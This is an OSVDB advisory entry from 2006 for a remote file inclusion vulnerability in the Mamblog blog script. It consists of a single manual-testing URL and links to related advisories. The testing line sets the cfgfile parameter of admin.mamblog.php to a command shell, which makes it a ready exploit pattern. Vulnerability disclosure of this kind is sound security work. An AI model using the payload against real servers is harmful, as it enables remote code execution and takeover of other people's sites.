Mamblog admin.mamblog.php cfgfile Variable Remote File Inclusion

2006-06-13T16:32:48
ID OSVDB:27663
Type osvdb
Reporter OSVDB
Modified 2006-06-13T16:32:48

Description

Manual Testing Notes

http://[target]/Mamblog/admin.mamblog.php?cfgfile=Command-Shell

References:

Vendor URL: http://scripts.ringsworld.com/blog/mamblog-1-0/ Other Advisory URL: http://www.root-security.org/danger/Mamblog.txt Other Advisory URL: http://www.security.nnov.ru/Ndocument124.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0242.html